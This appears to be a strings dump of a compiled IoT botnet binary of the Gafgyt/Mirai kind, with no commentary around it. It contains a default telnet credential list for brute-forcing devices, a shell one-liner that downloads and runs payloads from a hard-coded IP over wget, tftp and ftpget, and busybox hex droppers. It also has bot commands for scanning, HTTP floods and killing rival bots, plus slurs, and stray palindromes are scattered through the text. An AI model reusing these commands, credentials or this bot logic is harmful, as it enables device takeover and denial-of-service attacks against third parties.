PTRhDY
</v	
<suB
<du0
<xu0
<Xu0
<uu-
<cuJ
[^_]
1~`j
RQSPh
SVPh
SVPh
SVPh
SVPh'e
Phne
SVWQRP
SVRP
SVWRP
[^_]
< t	
< t	
Y[^_
UWVS
[^_]
UWVS
\$,e
$[^[^_]
[^_]
9S@t
@t	S
9S@t
K8uY
ZY@u
\$P9
UWVS
<rt=
<wt6f
<at.
u3jD
[^_]
c9Y@t&
9S@t
K8uh
UWVS
Z[^_]
UWVS
[^_]
UWVS
l$:_X
@;D$(|
D$$%
SVRP
;0u%
QRPP
[^_]
Z[^_
tR~P
tB~@=
UWVS
|$T;|$
:*u4
FkD$
D$8Pj
D$<P
T$X)
X[^_]
9S@t
K8u@
UWVS
t'9s@t
[^_]
t6;C
UWVS
D$KP
<[^_]
UWVS
Z[^_]
D$$P
UWVS
\$Hh,
D$,P
uT;t$
<0#|$
D$(P
4[^_]
UWVS
E,Z9
Z[^_]
UWVS
u89K
;U,tK
[^_]
UWVS
u99z
[^_]
D$ Pj
D$ Pht
UWVS
[^_]
UWVS
G;<$|
XZKy
[^_]
UWVS
[^_]
Z[^_
UWVS
(<`v
}2A;<$w
D$(!
ZY[^_]
8cu"
Z[^_
[^_]
ZY@u
Sh||
UWVS
t:;D$hu
D$p;D$xt*
D$|P
D$|e
T$(1
t$0P
t$lQ
UWVS
Z[^_]
Z[^_
VPX[^_
VHZ[^_
UWVS
<\udO
D$8@PS
T$8:
|$8G
T$8:
T$8:
[^_]
t$$j
UWVS
[^_]
UWVS
[^_]
UWVS
whVUR
[^[^_]
ZY[^_]
UWVS
[^_]
UWVS
 <au
u*z(
u?z=
D$<p
|$.f
0000
D$#f
D$Hp
|$P9
\$`1
|$#fto
D$#g
[^_]
UWVS
ZY[^_]
UWVS
9U@t
?]uG
<-u%
P uj
[^_]
UWVS
<	wK
Z[^_]
UWVS
T$!W
t$&[
?0uIW
|$!-t
w4[X
?0u:
?0u$
[^_]
9S@t
K8uG
9S@t
K8uE
UWVS
[^_]
UWVS
.u5A
Z[^_]
UWVS
t$hVU
t$hRVU
t$hj
t$TR
t$`j
<[^_]
UWVS
4/;5
*;\$
t$4R
\$09
\$09
t$4S
[^_]
UWVS
D$H D$'
t"9\$
([^_]
UWVS
[^_]
UWVS
D$$Q
[^_]
+r(e
[^_]
UWVS
Z[^_]
9S@t
9S@t
ZY[^_
UWVS
[^_]
UWVS
Z[^_]
UWVS
 Ph$
L$ 9
T$ 9
L$ 9
T$ 9
L$ )
L$ 9
God A red nugget A fat egg under a dog
 [^_]
UWVS
<0u#
$[^_]
UWVS
L$T)
;D$tv
T[^_]
UWVS
;T$(
u/;L$(
G;|$0sW
;\$(sNV
[^_]
UWVS
Y^=~
D$0Z
9L$0s
L$41
D$8@%
D$8f
L$89
H9D$0}	
\$ +\$<
D$LP
t$HU
D$ +D$<)
D$@y
L$HQ
Y9T$@|
T$D;
[^_]
UWVS
t-h[
tWj:U
uFj.S
[^_]
t$ j
UWVS
t$`PU
t$`j
D$8Pj
@;D$0v
Z9D$
8[^_]
\$CS
UWVS
[^_]
[^_]
t$lQ
Y[[^_
UWVS
[^_]
UWVS
[^_]
UWVS
Qj.W
[^_]
root
admin
guest
support
1234
12345
123456
vizxv
xc3511
juantech
xmhdipc
ZXDSL
password
bayandsl
Zte521
login
username
password
invalid
failed
incorrect
denied
error
goodbye
busybox
success
welcome
help
busy
mips
ifwatch
dropbear
wdog
btce
apache
telnet
superh
i586
i686
sparc
powerpc
dbus
legal
ntpd
wget
lizardgay
jackmy
prefix
nigger
[cpu
dongs
cron
sshd
openssh
bash
tftp
pftp
apache2
telnetd
cock
botnet
swatnet
dicknet
fucknet
cracknet
weednet
gaynet
queernet
ballnet
ugay
yougay
mipsel
tftp1
tftp2
Bppc
Bx64
Bsh4
Bsparc
Bi686
Bmips64
Bmips
Bmipsel
Barm7
wgetsh
x86_64
mips64
arm7
arm4
./busybox
./binary
/proc/
/cmdline
jackmysparc
jackmym86k
A Santa lives evil at NASA
jackmyi586
jackmypowerpcjackmyi68
jackmyarmv6
jackmyx86
jackmysh4
jackmymips
jackmymipsel
arm41
Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3
Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)
Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)
Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1
Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/7046A194A
Opera/9.80 (X11; Linux i686; Ubuntu/14.10) Presto/2.12.388 Version/12.16
http://google.com/
http://facebook.com/
http://youtube.com/
http://twitter.com/
http://tumblr.com/
http://cnn.com/
http://instagram.com/
http://snapchat.com/
http://whatsapp.com/
http://yahoo.com/
http://bing.com/
http://soundcloud.com/
http://spotify.com/
https://linux.die.net/
http://github.com/
http://blog.malwaremustdie.org/
cd /tmp || cd /var/run || cd /dev/shm || cd /mt || cd /var;rm -f *;busybox wget http://179.43.144.25/bin.sh || wget http://179.43.144.25/bin.sh || busybox tftp -r bin2.sh -g 179.43.144.25 || tftp -r bin2.sh -g 179.43.144.25 || busybox tftp 179.43.144.25 -c get bin3.sh || tftp 179.43.144.25 -c get bin3.sh || busybox ftpget 179.43.144.25 bin4.sh bin4.sh || ftpget 179.43.144.25 bin4.sh bin4.sh;sh bin.sh || sh bin2.sh || sh bin3.sh || sh bin4.sh;rm -f *;exit
busybox echo -e $(cat mips) > hex || echo -e $(cat mips) > hex; busybox chmod +x hex || chmod +x hex;./hex;busybox rm -f mips hex || rm -f mips hex
busybox echo -e $(cat arm) > hex || echo -e $(cat arm) > hex; busybox chmod +x hex || chmod +x hex;./hex;busybox rm -f arm hex || rm -f arm hex
(null)
Buffer: %s
PING
%s %s HTTP/1.1
Host: %s
Accept: */*
Referer: %s
User-Agent: %s
Connection: close
Eleele
%d.%d.%d.%d
Failed Telnet Attempt - %s:%s:%s
Successful Telnet Attempt - %s:%s:%s
sh || bash || shell
Sent Oneline! - %s:%s:%s
self
/proc/%s/cmdline
GET /%s
179.43.144.25
PONG!
SCANNER
HTTPFLOOD
head
HEAD
post
POST
KILLATTK
COOLMEMES
BOTKILL
Fork failed
Failed to connect
PONG
Link closed by server
(nil)
(null)
hlLjztqZ
npxXoudifFeEgGaACScs
 +0-#'I
Unknown error 
Success
Operation not permitted
No such file or directory
No such process
Interrupted system call
Input/output error
No such device or address
Argument list too long
Exec format error
Bad file descriptor
No child processes
Resource temporarily unavailable
Cannot allocate memory
Beeb
Tacocat
Permission denied
Bad address
Block device required
Device or resource busy
File exists
Invalid cross-device link
No such device
Not a directory
Is a directory
Invalid argument
Too many open files in system
Too many open files
Inappropriate ioctl for device
Text file busy
File too large
No space left on device
Illegal seek
Read-only file system
Too many links
Broken pipe
Numerical argument out of domain
Numerical result out of range
Resource deadlock avoided
File name too long
No locks available
Function not implemented
Directory not empty
Too many levels of symbolic links
No message of desired type
Identifier removed
Channel number out of range
Level 2 not synchronized
Level 3 halted
Level 3 reset
Link number out of range
Protocol driver not attached
No CSI structure available
Level 2 halted
Invalid exchange
Invalid request descriptor
Exchange full
No anode
Invalid request code
Invalid slot
Bad font file format
Device not a stream
No data available
Timer expired
Out of streams resources
Machine is not on the network
Package not installed
Object is remote
Link has been severed
Advertise error
Srmount error
Communication error on send
Protocol error
Multihop attempted
RFS specific error
Bad message
Value too large for defined data type
Name not unique on network
File descriptor in bad state
Remote address changed
Can not access a needed shared library
Accessing a corrupted shared library
.lib section in a.out corrupted
Attempting to link in too many shared libraries
Cannot exec a shared library directly
Invalid or incomplete multibyte or wide character
Interrupted system call should be restarted
Streams pipe error
Too many users
Socket operation on non-socket
Destination address required
Message too long
Protocol wrong type for socket
Protocol not available
Protocol not supported
Socket type not supported
Operation not supported
Protocol family not supported
Address family not supported by protocol
Address already in use
Cannot assign requested address
Network is down
Network is unreachable
Network dropped connection on reset
Software caused connection abort
Connection reset by peer
No buffer space available
Transport endpoint is already connected
Transport endpoint is not connected
Cannot send after transport endpoint shutdown
Too many references: cannot splice
Connection timed out
Connection refused
Host is down
No route to host
Operation already in progress
Operation now in progress
Stale NFS file handle
Structure needs cleaning
Not a XENIX named type file
No XENIX semaphores available
Is a named type file
Remote I/O error
Disk quota exceeded
No medium found
Wrong medium type
?/proc/stat
Degas are we not drawn onward no In union drawn onward to new eras aged
/proc/cpuinfo
processor
/sys/devices/system/cpu
/dev/null
L(knN
npxXoudifFeEgGaACSncs[
hlLjztq
nfinity
Borrow or rob
(nil)
infinity
set_thread_area failed when setting up thread-local storage
0123456789abcdef
/etc/resolv.conf
nameserver
domain
search
options
timeout
attempts
/etc/hosts
CAk[S
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
alula
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
Do nine men interpret Nine men I nod
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
.shstrtab
.init
.text
.fini
.rodata
.eh_frame
.tbss
.ctors
.dtors
.jcr
.got.plt
.data
.bss
.comment
